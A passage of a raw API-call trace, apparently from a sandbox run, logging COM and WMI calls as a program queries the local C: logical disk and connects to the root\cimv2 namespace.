[6]=0xfa, [7]=0x25)), ppvObject=0x6d8ed1c | out: ppvObject=0x6d8ed1c*=0x0) returned 0x80004002 [0148.118] IUnknown:Release (This=0xb51e34) returned 0x1 [0148.119] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e688 | out: ppv=0x6d8e688*=0x60248d0) returned 0x0 [0148.120] WbemDefPath:IUnknown:QueryInterface (in: This=0x60248d0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e8a0 | out: ppvObject=0x6d8e8a0*=0x0) returned 0x80004002 [0148.120] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60248d0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e8b4 | out: ppvObject=0x6d8e8b4*=0x6025610) returned 0x0 [0148.120] WbemDefPath:IUnknown:Release (This=0x60248d0) returned 0x0 [0148.120] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025610, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e4d4 | out: ppvObject=0x6d8e4d4*=0x6025610) returned 0x0 [0148.120] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025610, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e490 | out: ppvObject=0x6d8e490*=0x0) returned 0x80004002 [0148.120] WbemDefPath:IUnknown:AddRef (This=0x6025610) returned 0x3 [0148.120] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025610, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8ddec | out: ppvObject=0x6d8ddec*=0x0) returned 0x80004002 [0148.120] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025610, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dd9c | out: ppvObject=0x6d8dd9c*=0x0) returned 0x80004002 [0148.120] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025610, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dda8 | out: ppvObject=0x6d8dda8*=0xbb57d8) returned 0x0 [0148.120] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbb57d8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8ddb0 | out: pCid=0x6d8ddb0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0148.120] WbemDefPath:IUnknown:Release (This=0xbb57d8) returned 0x3 [0148.120] CoGetContextToken (in: pToken=0x6d8de08 | out: pToken=0x6d8de08) returned 0x0 [0148.120] CoGetContextToken (in: pToken=0x6d8e210 | out: pToken=0x6d8e210) returned 0x0 [0148.120] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025610, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e2a0 | out: ppvObject=0x6d8e2a0*=0x0) returned 0x80004002 [0148.120] WbemDefPath:IUnknown:Release (This=0x6025610) returned 0x2 [0148.120] WbemDefPath:IUnknown:Release (This=0x6025610) returned 0x1 [0148.120] CoGetContextToken (in: pToken=0x6d8eb98 | out: pToken=0x6d8eb98) returned 0x0 [0148.120] CoGetContextToken (in: pToken=0x6d8eaf8 | out: pToken=0x6d8eaf8) returned 0x0 [0148.120] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025610, riid=0x6d8ebc8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6d8ebc4 | out: ppvObject=0x6d8ebc4*=0x6025610) returned 0x0 [0148.121] WbemDefPath:IUnknown:AddRef (This=0x6025610) returned 0x3 [0148.121] WbemDefPath:IUnknown:Release (This=0x6025610) returned 0x2 [0148.121] WbemDefPath:IWbemPath:SetText (This=0x6025610, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0148.121] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025610, puCount=0x6d8ed4c | out: puCount=0x6d8ed4c*=0x0) returned 0x0 [0148.121] WbemDefPath:IWbemPath:GetText (in: This=0x6025610, lFlags=2, puBuffLength=0x6d8ed48*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed48*=0x20, pszText=0x0) returned 0x0 [0148.121] WbemDefPath:IWbemPath:GetText (in: This=0x6025610, lFlags=2, puBuffLength=0x6d8ed48*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed48*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0148.121] WbemDefPath:IWbemPath:GetInfo (in: This=0x6025610, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0148.121] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025610, puCount=0x6d8ed4c | out: puCount=0x6d8ed4c*=0x0) returned 0x0 [0148.121] WbemDefPath:IWbemPath:GetInfo (in: This=0x6025610, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0148.121] WbemDefPath:IWbemPath:GetInfo (in: This=0x6025610, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0148.121] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025610, puCount=0x6d8eccc | out: puCount=0x6d8eccc*=0x0) returned 0x0 [0148.121] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x6d8ecb8 | out: puCount=0x6d8ecb8*=0x2) returned 0x0 [0148.121] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6d8ecb4*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ecb4*=0xf, pszText=0x0) returned 0x0 [0148.121] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6d8ecb4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ecb4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0148.121] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ec68 | out: ppv=0x6d8ec68*=0xb51e34) returned 0x0 [0148.121] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ec60 | out: pAptType=0x6d8ec60*=1) returned 0x0 [0148.121] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ec64 | out: ppvObject=0x6d8ec64*=0x0) returned 0x80004002 [0148.121] IUnknown:Release (This=0xb51e34) returned 0x1 [0148.122] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e5d0 | out: ppv=0x6d8e5d0*=0x6024860) returned 0x0 [0148.122] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024860, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e7e8 | out: ppvObject=0x6d8e7e8*=0x0) returned 0x80004002 [0148.122] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6024860, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e7fc | out: ppvObject=0x6d8e7fc*=0x60255a0) returned 0x0 [0148.122] WbemDefPath:IUnknown:Release (This=0x6024860) returned 0x0 [0148.122] WbemDefPath:IUnknown:QueryInterface (in: This=0x60255a0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e41c | out: ppvObject=0x6d8e41c*=0x60255a0) returned 0x0 [0148.122] WbemDefPath:IUnknown:QueryInterface (in: This=0x60255a0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e3d8 | out: ppvObject=0x6d8e3d8*=0x0) returned 0x80004002 [0148.122] WbemDefPath:IUnknown:AddRef (This=0x60255a0) returned 0x3 [0148.122] WbemDefPath:IUnknown:QueryInterface (in: This=0x60255a0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8dd34 | out: ppvObject=0x6d8dd34*=0x0) returned 0x80004002 [0148.123] WbemDefPath:IUnknown:QueryInterface (in: This=0x60255a0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dce4 | out: ppvObject=0x6d8dce4*=0x0) returned 0x80004002 [0148.123] WbemDefPath:IUnknown:QueryInterface (in: This=0x60255a0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dcf0 | out: ppvObject=0x6d8dcf0*=0xbb59a8) returned 0x0 [0148.123] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbb59a8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8dcf8 | out: pCid=0x6d8dcf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0148.123] WbemDefPath:IUnknown:Release (This=0xbb59a8) returned 0x3 [0148.123] CoGetContextToken (in: pToken=0x6d8dd50 | out: pToken=0x6d8dd50) returned 0x0 [0148.123] CoGetContextToken (in: pToken=0x6d8e158 | out: pToken=0x6d8e158) returned 0x0 [0148.123] WbemDefPath:IUnknown:QueryInterface (in: This=0x60255a0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e1e8 | out: ppvObject=0x6d8e1e8*=0x0) returned 0x80004002 [0148.123] WbemDefPath:IUnknown:Release (This=0x60255a0) returned 0x2 [0148.123] WbemDefPath:IUnknown:Release (This=0x60255a0) returned 0x1 [0148.123] CoGetContextToken (in: pToken=0x6d8eae0 | out: pToken=0x6d8eae0) returned 0x0 [0148.123] CoGetContextToken (in: pToken=0x6d8ea40 | out: pToken=0x6d8ea40) returned 0x0 [0148.123] WbemDefPath:IUnknown:QueryInterface (in: This=0x60255a0, riid=0x6d8eb10*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6d8eb0c | out: ppvObject=0x6d8eb0c*=0x60255a0) returned 0x0 [0148.123] WbemDefPath:IUnknown:AddRef (This=0x60255a0) returned 0x3 [0148.123] WbemDefPath:IUnknown:Release (This=0x60255a0) returned 0x2 [0148.123] WbemDefPath:IWbemPath:SetText (This=0x60255a0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0148.123] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60255a0, puCount=0x6d8ec90 | out: puCount=0x6d8ec90*=0x2) returned 0x0 [0148.123] WbemDefPath:IWbemPath:GetText (in: This=0x60255a0, lFlags=4, puBuffLength=0x6d8ec8c*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ec8c*=0xf, pszText=0x0) returned 0x0 [0148.123] WbemDefPath:IWbemPath:GetText (in: This=0x60255a0, lFlags=4, puBuffLength=0x6d8ec8c*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ec8c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0148.123] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ec90 | out: ppv=0x6d8ec90*=0xb51e34) returned 0x0 [0148.123] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ec88 | out: pAptType=0x6d8ec88*=1) returned 0x0 [0148.123] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ec8c | out: ppvObject=0x6d8ec8c*=0x0) returned 0x80004002 [0148.123] IUnknown:Release (This=0xb51e34) returned 0x1 [0148.125] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e8b0 | out: ppv=0x6d8e8b0*=0x602b528) returned 0x0 [0148.125] WbemLocator:IUnknown:QueryInterface (in: This=0x602b528, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8eac8 | out: ppvObject=0x6d8eac8*=0x0) returned 0x80004002 [0148.125] WbemLocator:IClassFactory:CreateInstance (in: This=0x602b528, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8eadc | out: ppvObject=0x6d8eadc*=0x6024980) returned 0x0 [0148.125] WbemLocator:IUnknown:Release (This=0x602b528) returned 0x0 [0148.125] WbemLocator:IUnknown:QueryInterface (in: This=0x6024980, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e6fc | out: ppvObject=0x6d8e6fc*=0x6024980) returned 0x0 [0148.125] WbemLocator:IUnknown:QueryInterface (in: This=0x6024980, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e6b8 | out: ppvObject=0x6d8e6b8*=0x0) returned 0x80004002 [0148.125] WbemLocator:IUnknown:AddRef (This=0x6024980) returned 0x3 [0148.125] WbemLocator:IUnknown:QueryInterface (in: This=0x6024980, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8e014 | out: ppvObject=0x6d8e014*=0x0) returned 0x80004002 [0148.125] WbemLocator:IUnknown:QueryInterface (in: This=0x6024980, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dfc4 | out: ppvObject=0x6d8dfc4*=0x0) returned 0x80004002 [0148.125] WbemLocator:IUnknown:QueryInterface (in: This=0x6024980, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dfd0 | out: ppvObject=0x6d8dfd0*=0x0) returned 0x80004002 [0148.125] CoGetContextToken (in: pToken=0x6d8e030 | out: pToken=0x6d8e030) returned 0x0 [0148.125] CoGetContextToken (in: pToken=0x6d8e438 | out: pToken=0x6d8e438) returned 0x0 [0148.125] WbemLocator:IUnknown:QueryInterface (in: This=0x6024980, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e4c8 | out: ppvObject=0x6d8e4c8*=0x0) returned 0x80004002 [0148.125] WbemLocator:IUnknown:Release (This=0x6024980) returned 0x2 [0148.125] WbemLocator:IUnknown:Release (This=0x6024980) returned 0x1 [0148.125] CoGetContextToken (in: pToken=0x6d8eaa8 | out: pToken=0x6d8eaa8) returned 0x0 [0148.125] CoGetContextToken (in: pToken=0x6d8ea08 | out: pToken=0x6d8ea08) returned 0x0 [0148.125] WbemLocator:IUnknown:QueryInterface (in: This=0x6024980, riid=0x6d8ead8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6d8ead4 | out: ppvObject=0x6d8ead4*=0x6024980) returned 0x0 [0148.125] WbemLocator:IUnknown:AddRef (This=0x6024980) returned 0x3 [0148.126] WbemLocator:IUnknown:Release (This=0x6024980) returned 0x2 [0148.126] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60255a0, puCount=0x6d8ec6c | out: puCount=0x6d8ec6c*=0x2) returned 0x0 [0148.126] WbemDefPath:IWbemPath:GetText (in: This=0x60255a0, lFlags=8, puBuffLength=0x6d8ec68*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ec68*=0xf, pszText=0x0) returned 0x0 [0148.126] WbemDefPath:IWbemPath:GetText (in: This=0x60255a0, lFlags=8, puBuffLength=0x6d8ec68*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ec68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0148.126] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6d8eb44 | out: ppv=0x6d8eb44*=0x6024990) returned 0x0 [0148.126] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6024990, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6d8ebd8 | out: ppNamespace=0x6d8ebd8*=0x601ffe4) returned 0x0 [0149.173] WbemLocator:IUnknown:QueryInterface (in: This=0x601ffe4, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea74 | out: ppvObject=0x6d8ea74*=0xb5ae64) returned 0x0 [0149.173] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5ae64, pProxy=0x601ffe4, pAuthnSvc=0x6d8eac4, pAuthzSvc=0x6d8eac0, pServerPrincName=0x6d8eab8, pAuthnLevel=0x6d8eabc, pImpLevel=0x6d8eaac, pAuthInfo=0x6d8eab0, pCapabilites=0x6d8eab4 | out: pAuthnSvc=0x6d8eac4*=0xa, pAuthzSvc=0x6d8eac0*=0x0, pServerPrincName=0x6d8eab8, pAuthnLevel=0x6d8eabc*=0x6, pImpLevel=0x6d8eaac*=0x2, pAuthInfo=0x6d8eab0, pCapabilites=0x6d8eab4*=0x1) returned 0x0 [0149.173] WbemLocator:IUnknown:Release (This=0xb5ae64) returned 0x1 [0149.174] WbemLocator:IUnknown:QueryInterface (in: This=0x601ffe4, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea68 | out: ppvObject=0x6d8ea68*=0xb5ae84) returned 0x0 [0149.174] WbemLocator:IUnknown:QueryInterface (in: This=0x601ffe4, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea64 | out: ppvObject=0x6d8ea64*=0xb5ae64) returned 0x0 [0149.174] WbemLocator:IClientSecurity:SetBlanket (This=0xb5ae64, pProxy=0x601ffe4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0149.174] WbemLocator:IUnknown:Release (This=0xb5ae64) returned 0x2 [0149.174] WbemLocator:IUnknown:Release (This=0xb5ae84) returned 0x1 [0149.174] CoTaskMemFree (pv=0xbd4a68) [0149.174] WbemLocator:IUnknown:Release (This=0x6024990) returned 0x0 [0149.174] WbemLocator:IUnknown:QueryInterface (in: This=0x601ffe4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e664 | out: ppvObject=0x6d8e664*=0xb5ae84) returned 0x0 [0149.174] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ae84, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e620 | out: ppvObject=0x6d8e620*=0x0) returned 0x80004002 [0149.174] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ae84, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e43c | out: ppvObject=0x6d8e43c*=0x0) returned 0x80004002 [0149.175] WbemLocator:IUnknown:AddRef (This=0xb5ae84) returned 0x3 [0149.175] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ae84, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8df7c | out: ppvObject=0x6d8df7c*=0x0) returned 0x80004002 [0149.175] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ae84, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8df2c | out: ppvObject=0x6d8df2c*=0x0) returned 0x80004002 [0149.175] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ae84, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8df38 | out: ppvObject=0x6d8df38*=0xb5ade4) returned 0x0 [0149.176] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5ade4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8df40 | out: pCid=0x6d8df40*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0149.176] WbemLocator:IUnknown:Release (This=0xb5ade4) returned 0x3 [0149.176] CoGetContextToken (in: pToken=0x6d8df98 | out: pToken=0x6d8df98) returned 0x0 [0149.176] CoGetContextToken (in: pToken=0x6d8e3a0 | out: pToken=0x6d8e3a0) returned 0x0 [0149.176] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ae84, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e430 | out: ppvObject=0x6d8e430*=0xb5ae6c) returned 0x0 [0149.176] WbemLocator:IRpcOptions:Query (in: This=0xb5ae6c, pPrx=0xb5ae84, dwProperty=2, pdwValue=0x6d8e458 | out: 